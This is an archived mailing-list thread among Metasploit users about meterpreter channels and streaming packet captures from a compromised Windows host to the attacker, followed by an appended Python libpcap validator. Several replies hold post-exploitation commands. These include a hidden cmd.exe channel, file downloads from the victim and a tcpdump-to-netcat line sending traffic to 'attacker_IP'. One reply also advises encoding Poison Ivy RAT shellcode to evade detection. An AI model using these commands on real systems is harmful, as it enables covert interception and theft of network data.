Bryan Richardson wrote:
> Hi again Anastasios,
>
> Quick question... is there anything in the Metasploit Rex library that would
> allow me to start up a listener similar to netcat directly in Metasploit?
> This way, I could receive the results of my remote sniffing directly in my
> program and analyze it in real time...
>
> Also, I've figured out how to access the channel created for an executed
> process. Do you know of any way I could pipe output from a command I
> execute on the compromised machine to the channel? For example, if I run
> tcpdump on the compromised host, I can read the output of the command via
> the channel. However, this output is not in pcap format. In order to get
> it in pcap format, I have to use the '-w' option to write it to a file in
> pcap format. I can tell '-w' to write the data in pcap format to stdin
> using '-' as the value for '-w', then pipe stdin to something like netcat.
>
> In turn, I'd like to be able to either pipe the data to the channel, or pipe
> it to netcat and hopefully use something in the Rex library to receive the
> pcap data...
>
> What do you think?
>
> --
> Thanks!
> Bryan
>
> 2009/2/9 Anastasios Monachos <anastasi...@gmail.com>
>
>> 2009/2/9 Bryan Richardson <btri...@gmail.com>
>>
>>> Thanks Anastasios,
>>>
>>> So, am I correct in assuming this is how one is dumped into a Windows
>>> shell after executing an exploit on a vulnerable Windows machine?
>>>
>> Bryan, if I am following you correctly, yes, using the download command
>> supplied by the meterpreter payload you can get a file from the victim's
>> machine to your machine. Note that in the case of Windows you will have to
>> escape the \ with an extra \ when (if) specifying the full path of the
>> file's source and destination; obviously, if you do "download file.txt
>> file.txt" it will try to get the file from the victim's current directory
>> and save it to your current directory.
>>
>>> I was hoping that I could 'channelize' a traffic sniffer such that the
>>> sniffed traffic would be sent back to me in real time for real time
>>> analysis... it doesn't seem like this is the case.
>>>
>> I agree, real-time traffic in some environments really helps the whole task.
>>
>>> Ultimately, what would be cool is to have my real-time traffic analysis
>>> software listening on a particular port and have some way of sending the
>>> sniffed traffic from the compromised machine to that particular port on my
>>> local machine.
>>>
>> I think it is worth trying to pipe your live data through nc as we do with
>> dd, but I am not sure if it will work in your case; oh, you will have to
>> let your nc traffic pass the firewall.
>>
>> For example:
>> On the victim you can try something like:
>>   tcpdump -e host victim_ip and port 23 | nc attacker_IP attacker_listening_port
>> On the attacker:
>>   nc -l -p attacker_listening_port | wireshark -i -
>> Taken from wireshark's man page:
>> " .... Pipe names should be either the name of a FIFO (named pipe) or
>> ''-'' to read data from the standard input. Data read from pipes
>> must be in standard libpcap format...."
>>
>> Last, you may also play with the channel read/write options, so as to pass
>> nc's traffic through the channel (?); maybe someone else can shed more
>> light here.
>>
>> Let us know what worked and what didn't anyway.
>>
>> Tasos
>>
>>> --
>>> Bryan
>>>
>>> On Mon, Feb 9, 2009 at 2:26 PM, Anastasios Monachos <
>>> anastasi...@gmail.com> wrote:
>>>
>>>> 2009/2/9 Bryan Richardson <btri...@gmail.com>
>>>>
>>>>> Hello All,
>>>>> Would someone mind explaining to me what 'channelized' is and how it
>>>>> works?
>>>>>
>>>> You can use "channelisation" in cases where you wish to work with
>>>> multiple communication channels that will be tunnelled through one
>>>> tcp/ip session.
>>>>
>>>> Channels are supported by the meterpreter payload, and to channelise
>>>> you can do:
>>>>
>>>> meterpreter > execute -f cmd.exe -H -c   //this will execute the file
>>>> cmd.exe, it will hide the process window and it will channelise the task
>>>>
>>>> Process 1234 created.   //this is output from meterpreter
>>>>
>>>> Channel 2 created.   //this is output from meterpreter
>>>>
>>>> meterpreter >   //now use meterpreter as usual to do your other stuff
>>>>
>>>> meterpreter > interact 2   //now interact with the channelised cmd.exe
>>>>
>>>>> I'm wanting to try and use it to send sniffed traffic back to me from a
>>>>> compromised machine that I upload a traffic sniffer to...
>>>>>
>>>> For already saved captured data you could use the upload/download
>>>> commands (again from within meterpreter).
>>>>
>>>>> --
>>>>> Thanks!
>>>>> Bryan
>>>>>
>>>>> _______________________________________________
>>>>> Framework-Hackers mailing list
>>>>> Framework-Hackers@spool.metasploit.com
>>>>> http://spool.metasploit.com/mailman/listinfo/framework-hackers
>>>>>
>>>> --
>>>> AM
>>>>
>> --
>> AM
>
Sorry if I misunderstood you. But as far as I can see, you're requesting full control of hosts, so in that case it may be a less painful solution to install a remote administration tool on the compromised host. For example, you could check out Poison Ivy (http://www.poisonivy-rat.com), generate a shellcode, encode it with msfencode to make it stealthy, and then listen for the connection with the client. This tool will allow you to sniff, set up a socks server, besides other features.

I found it useful some time ago - still, I dropped it with time - to have such a shellcode integrated in msf payload/single, for customizing its settings and automatic encoding. There are some things where metasploit isn't enough, or cases where it could be achieved less painfully, as I said.

Hope this helps.
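The wireshark man page quoted above requires that whatever arrives on the pipe be in standard libpcap format; tcpdump's default text output (without -w -) is not, and wireshark -i - will reject it. The check below, an added example rather than code from the thread or from Metasploit, parses a libpcap byte stream on the receiving side and refuses anything else; it handles both byte orders and both timestamp resolutions, and the sample capture it builds is constructed, not a real recording.

```python
import struct
import sys

# First 4 bytes unpacked little-endian -> (struct byte-order prefix, timestamp ticks per second)
_MAGICS = {
    0xA1B2C3D4: ("<", 1_000_000),      # little-endian, microseconds
    0xA1B23C4D: ("<", 1_000_000_000),  # little-endian, nanoseconds
    0xD4C3B2A1: (">", 1_000_000),      # big-endian, microseconds
    0x4D3CB2A1: (">", 1_000_000_000),  # big-endian, nanoseconds
}

def parse_pcap_stream(data: bytes):
    """Return (linktype, snaplen, [(timestamp, packet_bytes), ...]); ValueError if not libpcap."""
    if len(data) < 24:
        raise ValueError("stream shorter than the 24-byte libpcap global header")
    magic = struct.unpack("<I", data[:4])[0]
    if magic not in _MAGICS:
        raise ValueError("not a libpcap stream: bad magic 0x%08x" % magic)
    order, ticks = _MAGICS[magic]
    # global header after the magic: version major/minor, thiszone, sigfigs, snaplen, linktype
    _major, _minor, _tz, _sigfigs, snaplen, linktype = struct.unpack(order + "HHiIII", data[4:24])
    packets = []
    off = 24
    while off < len(data):
        if off + 16 > len(data):
            raise ValueError("truncated packet record header at offset %d" % off)
        ts_sec, ts_frac, incl_len, _orig_len = struct.unpack(order + "IIII", data[off:off + 16])
        off += 16
        if incl_len > snaplen or off + incl_len > len(data):
            raise ValueError("packet record at offset %d exceeds snaplen or stream" % (off - 16))
        packets.append((ts_sec + ts_frac / ticks, data[off:off + incl_len]))
        off += incl_len
    return linktype, snaplen, packets

def build_sample(order: str = "<") -> bytes:
    """Constructed sample (not a real capture): one 14-byte Ethernet header, DLT_EN10MB (1)."""
    header = struct.pack(order + "IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    frame = bytes.fromhex("ff" * 6 + "00" * 6 + "0800")
    record = struct.pack(order + "IIII", 1234567890, 500000, len(frame), len(frame)) + frame
    return header + record

if __name__ == "__main__":
    # Validate stdin (e.g. "nc -l -p PORT | python3 this.py") before any analysis tooling sees it
    try:
        linktype, snaplen, pkts = parse_pcap_stream(sys.stdin.buffer.read())
    except ValueError as exc:
        sys.exit("rejected: %s" % exc)
    print("libpcap stream: linktype=%d snaplen=%d packets=%d" % (linktype, snaplen, len(pkts)))
```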